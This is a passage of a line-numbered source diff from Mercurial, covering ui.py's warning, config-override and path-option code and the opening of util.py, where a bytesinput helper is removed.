1565 total=total)
1571 total=total)
1566 if pos is None or not self.configbool('progress', 'debug'):
1572 if pos is None or not self.configbool('progress', 'debug'):
1567 return
1573 return
1568
1574
1569 if unit:
1575 if unit:
1570 unit = ' ' + unit
1576 unit = ' ' + unit
1571 if item:
1577 if item:
1572 item = ' ' + item
1578 item = ' ' + item
1573
1579
1574 if total:
1580 if total:
1575 pct = 100.0 * pos / total
1581 pct = 100.0 * pos / total
1576 self.debug('%s:%s %d/%d%s (%4.2f%%)\n'
1582 self.debug('%s:%s %d/%d%s (%4.2f%%)\n'
1577 % (topic, item, pos, total, unit, pct))
1583 % (topic, item, pos, total, unit, pct))
1578 else:
1584 else:
1579 self.debug('%s:%s %d%s\n' % (topic, item, pos, unit))
1585 self.debug('%s:%s %d%s\n' % (topic, item, pos, unit))
1580
1586
1581 def log(self, service, *msg, **opts):
1587 def log(self, service, *msg, **opts):
1582 '''hook for logging facility extensions
1588 '''hook for logging facility extensions
1583
1589
1584 service should be a readily-identifiable subsystem, which will
1590 service should be a readily-identifiable subsystem, which will
1585 allow filtering.
1591 allow filtering.
1586
1592
1587 *msg should be a newline-terminated format string to log, and
1593 *msg should be a newline-terminated format string to log, and
1588 then any values to %-format into that format string.
1594 then any values to %-format into that format string.
1589
1595
1590 **opts currently has no defined meanings.
1596 **opts currently has no defined meanings.
1591 '''
1597 '''
1592
1598
1593 def label(self, msg, label):
1599 def label(self, msg, label):
1594 '''style msg based on supplied label
1600 '''style msg based on supplied label
1595
1601
1596 If some color mode is enabled, this will add the necessary control
1602 If some color mode is enabled, this will add the necessary control
1597 characters to apply such color. In addition, 'debug' color mode adds
1603 characters to apply such color. In addition, 'debug' color mode adds
1598 markup showing which label affects a piece of text.
1604 markup showing which label affects a piece of text.
1599
1605
1600 ui.write(s, 'label') is equivalent to
1606 ui.write(s, 'label') is equivalent to
1601 ui.write(ui.label(s, 'label')).
1607 ui.write(ui.label(s, 'label')).
1602 '''
1608 '''
1603 if self._colormode is not None:
1609 if self._colormode is not None:
1604 return color.colorlabel(self, msg, label)
1610 return color.colorlabel(self, msg, label)
1605 return msg
1611 return msg
1606
1612
1607 def develwarn(self, msg, stacklevel=1, config=None):
1613 def develwarn(self, msg, stacklevel=1, config=None):
1608 """issue a developer warning message
1614 """issue a developer warning message
1609
1615
1610 Use 'stacklevel' to report the offender some layers further up in the
1616 Use 'stacklevel' to report the offender some layers further up in the
1611 stack.
1617 stack.
1612 """
1618 """
1613 if not self.configbool('devel', 'all-warnings'):
1619 if not self.configbool('devel', 'all-warnings'):
1614 if config is None or not self.configbool('devel', config):
1620 if config is None or not self.configbool('devel', config):
1615 return
1621 return
1616 msg = 'devel-warn: ' + msg
1622 msg = 'devel-warn: ' + msg
1617 stacklevel += 1 # get in develwarn
1623 stacklevel += 1 # get in develwarn
1618 if self.tracebackflag:
1624 if self.tracebackflag:
1619 util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
1625 util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
1620 self.log('develwarn', '%s at:\n%s' %
1626 self.log('develwarn', '%s at:\n%s' %
1621 (msg, ''.join(util.getstackframes(stacklevel))))
1627 (msg, ''.join(util.getstackframes(stacklevel))))
1622 else:
1628 else:
1623 curframe = inspect.currentframe()
1629 curframe = inspect.currentframe()
1624 calframe = inspect.getouterframes(curframe, 2)
1630 calframe = inspect.getouterframes(curframe, 2)
1625 fname, lineno, fmsg = calframe[stacklevel][1:4]
1631 fname, lineno, fmsg = calframe[stacklevel][1:4]
1626 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
1632 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
1627 self.write_err('%s at: %s:%d (%s)\n'
1633 self.write_err('%s at: %s:%d (%s)\n'
1628 % (msg, fname, lineno, fmsg))
1634 % (msg, fname, lineno, fmsg))
1629 self.log('develwarn', '%s at: %s:%d (%s)\n',
1635 self.log('develwarn', '%s at: %s:%d (%s)\n',
1630 msg, fname, lineno, fmsg)
1636 msg, fname, lineno, fmsg)
1631 curframe = calframe = None # avoid cycles
1637 curframe = calframe = None # avoid cycles
1632
1638
1633 def deprecwarn(self, msg, version, stacklevel=2):
1639 def deprecwarn(self, msg, version, stacklevel=2):
1634 """issue a deprecation warning
1640 """issue a deprecation warning
1635
1641
1636 - msg: message explaining what is deprecated and how to upgrade,
1642 - msg: message explaining what is deprecated and how to upgrade,
1637 - version: last version where the API will be supported,
1643 - version: last version where the API will be supported,
1638 """
1644 """
1639 if not (self.configbool('devel', 'all-warnings')
1645 if not (self.configbool('devel', 'all-warnings')
1640 or self.configbool('devel', 'deprec-warn')):
1646 or self.configbool('devel', 'deprec-warn')):
1641 return
1647 return
1642 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
1648 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
1643 " update your code.)") % version
1649 " update your code.)") % version
1644 self.develwarn(msg, stacklevel=stacklevel, config='deprec-warn')
1650 self.develwarn(msg, stacklevel=stacklevel, config='deprec-warn')
1645
1651
1646 def exportableenviron(self):
1652 def exportableenviron(self):
1647 """The environment variables that are safe to export, e.g. through
1653 """The environment variables that are safe to export, e.g. through
1648 hgweb.
1654 hgweb.
1649 """
1655 """
1650 return self._exportableenviron
1656 return self._exportableenviron
1651
1657
1652 @contextlib.contextmanager
1658 @contextlib.contextmanager
1653 def configoverride(self, overrides, source=""):
1659 def configoverride(self, overrides, source=""):
1654 """Context manager for temporary config overrides
1660 """Context manager for temporary config overrides
1655 `overrides` must be a dict of the following structure:
1661 `overrides` must be a dict of the following structure:
1656 {(section, name) : value}"""
1662 {(section, name) : value}"""
1657 backups = {}
1663 backups = {}
1658 try:
1664 try:
1659 for (section, name), value in overrides.items():
1665 for (section, name), value in overrides.items():
1660 backups[(section, name)] = self.backupconfig(section, name)
1666 backups[(section, name)] = self.backupconfig(section, name)
1661 self.setconfig(section, name, value, source)
1667 self.setconfig(section, name, value, source)
1662 yield
1668 yield
1663 finally:
1669 finally:
1664 for __, backup in backups.items():
1670 for __, backup in backups.items():
1665 self.restoreconfig(backup)
1671 self.restoreconfig(backup)
1666 # just restoring ui.quiet config to the previous value is not enough
1672 # just restoring ui.quiet config to the previous value is not enough
1667 # as it does not update ui.quiet class member
1673 # as it does not update ui.quiet class member
1668 if ('ui', 'quiet') in overrides:
1674 if ('ui', 'quiet') in overrides:
1669 self.fixconfig(section='ui')
1675 self.fixconfig(section='ui')
1670
1676
1671 class paths(dict):
1677 class paths(dict):
1672 """Represents a collection of paths and their configs.
1678 """Represents a collection of paths and their configs.
1673
1679
1674 Data is initially derived from ui instances and the config files they have
1680 Data is initially derived from ui instances and the config files they have
1675 loaded.
1681 loaded.
1676 """
1682 """
1677 def __init__(self, ui):
1683 def __init__(self, ui):
1678 dict.__init__(self)
1684 dict.__init__(self)
1679
1685
1680 for name, loc in ui.configitems('paths', ignoresub=True):
1686 for name, loc in ui.configitems('paths', ignoresub=True):
1681 # No location is the same as not existing.
1687 # No location is the same as not existing.
1682 if not loc:
1688 if not loc:
1683 continue
1689 continue
1684 loc, sub = ui.configsuboptions('paths', name)
1690 loc, sub = ui.configsuboptions('paths', name)
1685 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
1691 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
1686
1692
1687 def getpath(self, name, default=None):
1693 def getpath(self, name, default=None):
1688 """Return a ``path`` from a string, falling back to default.
1694 """Return a ``path`` from a string, falling back to default.
1689
1695
1690 ``name`` can be a named path or locations. Locations are filesystem
1696 ``name`` can be a named path or locations. Locations are filesystem
1691 paths or URIs.
1697 paths or URIs.
1692
1698
1693 Returns None if ``name`` is not a registered path, a URI, or a local
1699 Returns None if ``name`` is not a registered path, a URI, or a local
1694 path to a repo.
1700 path to a repo.
1695 """
1701 """
1696 # Only fall back to default if no path was requested.
1702 # Only fall back to default if no path was requested.
1697 if name is None:
1703 if name is None:
1698 if not default:
1704 if not default:
1699 default = ()
1705 default = ()
1700 elif not isinstance(default, (tuple, list)):
1706 elif not isinstance(default, (tuple, list)):
1701 default = (default,)
1707 default = (default,)
1702 for k in default:
1708 for k in default:
1703 try:
1709 try:
1704 return self[k]
1710 return self[k]
1705 except KeyError:
1711 except KeyError:
1706 continue
1712 continue
1707 return None
1713 return None
1708
1714
1709 # Most likely empty string.
1715 # Most likely empty string.
1710 # This may need to raise in the future.
1716 # This may need to raise in the future.
1711 if not name:
1717 if not name:
1712 return None
1718 return None
1713
1719
1714 try:
1720 try:
1715 return self[name]
1721 return self[name]
1716 except KeyError:
1722 except KeyError:
1717 # Try to resolve as a local path or URI.
1723 # Try to resolve as a local path or URI.
1718 try:
1724 try:
1719 # We don't pass sub-options in, so no need to pass ui instance.
1725 # We don't pass sub-options in, so no need to pass ui instance.
1720 return path(None, None, rawloc=name)
1726 return path(None, None, rawloc=name)
1721 except ValueError:
1727 except ValueError:
1722 raise error.RepoError(_('repository %s does not exist') %
1728 raise error.RepoError(_('repository %s does not exist') %
1723 name)
1729 name)
1724
1730
1725 _pathsuboptions = {}
1731 _pathsuboptions = {}
1726
1732
1727 def pathsuboption(option, attr):
1733 def pathsuboption(option, attr):
1728 """Decorator used to declare a path sub-option.
1734 """Decorator used to declare a path sub-option.
1729
1735
1730 Arguments are the sub-option name and the attribute it should set on
1736 Arguments are the sub-option name and the attribute it should set on
1731 ``path`` instances.
1737 ``path`` instances.
1732
1738
1733 The decorated function will receive as arguments a ``ui`` instance,
1739 The decorated function will receive as arguments a ``ui`` instance,
1734 ``path`` instance, and the string value of this option from the config.
1740 ``path`` instance, and the string value of this option from the config.
1735 The function should return the value that will be set on the ``path``
1741 The function should return the value that will be set on the ``path``
1736 instance.
1742 instance.
1737
1743
1738 This decorator can be used to perform additional verification of
1744 This decorator can be used to perform additional verification of
1739 sub-options and to change the type of sub-options.
1745 sub-options and to change the type of sub-options.
1740 """
1746 """
1741 def register(func):
1747 def register(func):
1742 _pathsuboptions[option] = (attr, func)
1748 _pathsuboptions[option] = (attr, func)
1743 return func
1749 return func
1744 return register
1750 return register
1745
1751
1746 @pathsuboption('pushurl', 'pushloc')
1752 @pathsuboption('pushurl', 'pushloc')
1747 def pushurlpathoption(ui, path, value):
1753 def pushurlpathoption(ui, path, value):
1748 u = util.url(value)
1754 u = util.url(value)
1749 # Actually require a URL.
1755 # Actually require a URL.
1750 if not u.scheme:
1756 if not u.scheme:
1751 ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
1757 ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
1752 return None
1758 return None
1753
1759
1754 # Don't support the #foo syntax in the push URL to declare branch to
1760 # Don't support the #foo syntax in the push URL to declare branch to
1755 # push.
1761 # push.
1756 if u.fragment:
1762 if u.fragment:
1757 ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
1763 ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
1758 'ignoring)\n') % path.name)
1764 'ignoring)\n') % path.name)
1759 u.fragment = None
1765 u.fragment = None
1760
1766
1761 return bytes(u)
1767 return bytes(u)
1762
1768
1763 @pathsuboption('pushrev', 'pushrev')
1769 @pathsuboption('pushrev', 'pushrev')
1764 def pushrevpathoption(ui, path, value):
1770 def pushrevpathoption(ui, path, value):
1765 return value
1771 return value
1766
1772
1767 class path(object):
1773 class path(object):
1768 """Represents an individual path and its configuration."""
1774 """Represents an individual path and its configuration."""
1769
1775
1770 def __init__(self, ui, name, rawloc=None, suboptions=None):
1776 def __init__(self, ui, name, rawloc=None, suboptions=None):
1771 """Construct a path from its config options.
1777 """Construct a path from its config options.
1772
1778
1773 ``ui`` is the ``ui`` instance the path is coming from.
1779 ``ui`` is the ``ui`` instance the path is coming from.
1774 ``name`` is the symbolic name of the path.
1780 ``name`` is the symbolic name of the path.
1775 ``rawloc`` is the raw location, as defined in the config.
1781 ``rawloc`` is the raw location, as defined in the config.
1776 ``pushloc`` is the raw locations pushes should be made to.
1782 ``pushloc`` is the raw locations pushes should be made to.
1777
1783
1778 If ``name`` is not defined, we require that the location be a) a local
1784 If ``name`` is not defined, we require that the location be a) a local
1779 filesystem path with a .hg directory or b) a URL. If not,
1785 filesystem path with a .hg directory or b) a URL. If not,
1780 ``ValueError`` is raised.
1786 ``ValueError`` is raised.
1781 """
1787 """
1782 if not rawloc:
1788 if not rawloc:
1783 raise ValueError('rawloc must be defined')
1789 raise ValueError('rawloc must be defined')
1784
1790
1785 # Locations may define branches via syntax <base>#<branch>.
1791 # Locations may define branches via syntax <base>#<branch>.
1786 u = util.url(rawloc)
1792 u = util.url(rawloc)
1787 branch = None
1793 branch = None
1788 if u.fragment:
1794 if u.fragment:
1789 branch = u.fragment
1795 branch = u.fragment
1790 u.fragment = None
1796 u.fragment = None
1791
1797
1792 self.url = u
1798 self.url = u
1793 self.branch = branch
1799 self.branch = branch
1794
1800
1795 self.name = name
1801 self.name = name
1796 self.rawloc = rawloc
1802 self.rawloc = rawloc
1797 self.loc = '%s' % u
1803 self.loc = '%s' % u
1798
1804
1799 # When given a raw location but not a symbolic name, validate the
1805 # When given a raw location but not a symbolic name, validate the
1800 # location is valid.
1806 # location is valid.
1801 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
1807 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
1802 raise ValueError('location is not a URL or path to a local '
1808 raise ValueError('location is not a URL or path to a local '
1803 'repo: %s' % rawloc)
1809 'repo: %s' % rawloc)
1804
1810
1805 suboptions = suboptions or {}
1811 suboptions = suboptions or {}
1806
1812
1807 # Now process the sub-options. If a sub-option is registered, its
1813 # Now process the sub-options. If a sub-option is registered, its
1808 # attribute will always be present. The value will be None if there
1814 # attribute will always be present. The value will be None if there
1809 # was no valid sub-option.
1815 # was no valid sub-option.
1810 for suboption, (attr, func) in _pathsuboptions.iteritems():
1816 for suboption, (attr, func) in _pathsuboptions.iteritems():
1811 if suboption not in suboptions:
1817 if suboption not in suboptions:
1812 setattr(self, attr, None)
1818 setattr(self, attr, None)
1813 continue
1819 continue
1814
1820
1815 value = func(ui, self, suboptions[suboption])
1821 value = func(ui, self, suboptions[suboption])
1816 setattr(self, attr, value)
1822 setattr(self, attr, value)
1817
1823
1818 def _isvalidlocalpath(self, path):
1824 def _isvalidlocalpath(self, path):
1819 """Returns True if the given path is a potentially valid repository.
1825 """Returns True if the given path is a potentially valid repository.
1820 This is its own function so that extensions can change the definition of
1826 This is its own function so that extensions can change the definition of
1821 'valid' in this case (like when pulling from a git repo into a hg
1827 'valid' in this case (like when pulling from a git repo into a hg
1822 one)."""
1828 one)."""
1823 return os.path.isdir(os.path.join(path, '.hg'))
1829 return os.path.isdir(os.path.join(path, '.hg'))
1824
1830
1825 @property
1831 @property
1826 def suboptions(self):
1832 def suboptions(self):
1827 """Return sub-options and their values for this path.
1833 """Return sub-options and their values for this path.
1828
1834
1829 This is intended to be used for presentation purposes.
1835 This is intended to be used for presentation purposes.
1830 """
1836 """
1831 d = {}
1837 d = {}
1832 for subopt, (attr, _func) in _pathsuboptions.iteritems():
1838 for subopt, (attr, _func) in _pathsuboptions.iteritems():
1833 value = getattr(self, attr)
1839 value = getattr(self, attr)
1834 if value is not None:
1840 if value is not None:
1835 d[subopt] = value
1841 d[subopt] = value
1836 return d
1842 return d
1837
1843
1838 # we instantiate one globally shared progress bar to avoid
1844 # we instantiate one globally shared progress bar to avoid
1839 # competing progress bars when multiple UI objects get created
1845 # competing progress bars when multiple UI objects get created
1840 _progresssingleton = None
1846 _progresssingleton = None
1841
1847
1842 def getprogbar(ui):
1848 def getprogbar(ui):
1843 global _progresssingleton
1849 global _progresssingleton
1844 if _progresssingleton is None:
1850 if _progresssingleton is None:
1845 # passing 'ui' object to the singleton is fishy,
1851 # passing 'ui' object to the singleton is fishy,
1846 # this is how the extension used to work but feel free to rework it.
1852 # this is how the extension used to work but feel free to rework it.
1847 _progresssingleton = progress.progbar(ui)
1853 _progresssingleton = progress.progbar(ui)
1848 return _progresssingleton
1854 return _progresssingleton
1849
1855
1850 def haveprogbar():
1856 def haveprogbar():
1851 return _progresssingleton is not None
1857 return _progresssingleton is not None
@@ -1,4063 +1,4055
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 def safehasattr(thing, attr):
179 def safehasattr(thing, attr):
180 return getattr(thing, attr, _notset) is not _notset
180 return getattr(thing, attr, _notset) is not _notset
181
181
182 def _rapply(f, xs):
182 def _rapply(f, xs):
183 if xs is None:
183 if xs is None:
184 # assume None means non-value of optional data
184 # assume None means non-value of optional data
185 return xs
185 return xs
186 if isinstance(xs, (list, set, tuple)):
186 if isinstance(xs, (list, set, tuple)):
187 return type(xs)(_rapply(f, x) for x in xs)
187 return type(xs)(_rapply(f, x) for x in xs)
188 if isinstance(xs, dict):
188 if isinstance(xs, dict):
189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
189 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return f(xs)
190 return f(xs)
191
191
192 def rapply(f, xs):
192 def rapply(f, xs):
193 """Apply function recursively to every item preserving the data structure
193 """Apply function recursively to every item preserving the data structure
194
194
195 >>> def f(x):
195 >>> def f(x):
196 ... return 'f(%s)' % x
196 ... return 'f(%s)' % x
197 >>> rapply(f, None) is None
197 >>> rapply(f, None) is None
198 True
198 True
199 >>> rapply(f, 'a')
199 >>> rapply(f, 'a')
200 'f(a)'
200 'f(a)'
201 >>> rapply(f, {'a'}) == {'f(a)'}
201 >>> rapply(f, {'a'}) == {'f(a)'}
202 True
202 True
203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
203 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
204 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205
205
206 >>> xs = [object()]
206 >>> xs = [object()]
207 >>> rapply(pycompat.identity, xs) is xs
207 >>> rapply(pycompat.identity, xs) is xs
208 True
208 True
209 """
209 """
210 if f is pycompat.identity:
210 if f is pycompat.identity:
211 # fast path mainly for py2
211 # fast path mainly for py2
212 return xs
212 return xs
213 return _rapply(f, xs)
213 return _rapply(f, xs)
214
214
215 def bytesinput(fin, fout, *args, **kwargs):
216 sin, sout = sys.stdin, sys.stdout
217 try:
218 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
219 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
220 finally:
221 sys.stdin, sys.stdout = sin, sout
222
223 def bitsfrom(container):
215 def bitsfrom(container):
224 bits = 0
216 bits = 0
225 for bit in container:
217 for bit in container:
226 bits |= bit
218 bits |= bit
227 return bits
219 return bits
228
220
229 # python 2.6 still have deprecation warning enabled by default. We do not want
221 # python 2.6 still have deprecation warning enabled by default. We do not want
230 # to display anything to standard user so detect if we are running test and
222 # to display anything to standard user so detect if we are running test and
231 # only use python deprecation warning in this case.
223 # only use python deprecation warning in this case.
232 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
224 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
233 if _dowarn:
225 if _dowarn:
234 # explicitly unfilter our warning for python 2.7
226 # explicitly unfilter our warning for python 2.7
235 #
227 #
236 # The option of setting PYTHONWARNINGS in the test runner was investigated.
228 # The option of setting PYTHONWARNINGS in the test runner was investigated.
237 # However, module name set through PYTHONWARNINGS was exactly matched, so
229 # However, module name set through PYTHONWARNINGS was exactly matched, so
238 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
230 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
239 # makes the whole PYTHONWARNINGS thing useless for our usecase.
231 # makes the whole PYTHONWARNINGS thing useless for our usecase.
240 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
241 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
242 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
243 if _dowarn and pycompat.ispy3:
235 if _dowarn and pycompat.ispy3:
244 # silence warning emitted by passing user string to re.sub()
236 # silence warning emitted by passing user string to re.sub()
245 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
237 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
246 r'mercurial')
238 r'mercurial')
247 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
239 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
248 DeprecationWarning, r'mercurial')
240 DeprecationWarning, r'mercurial')
249
241
250 def nouideprecwarn(msg, version, stacklevel=1):
242 def nouideprecwarn(msg, version, stacklevel=1):
251 """Issue an python native deprecation warning
243 """Issue an python native deprecation warning
252
244
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
245 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 """
246 """
255 if _dowarn:
247 if _dowarn:
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
248 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 " update your code.)") % version
249 " update your code.)") % version
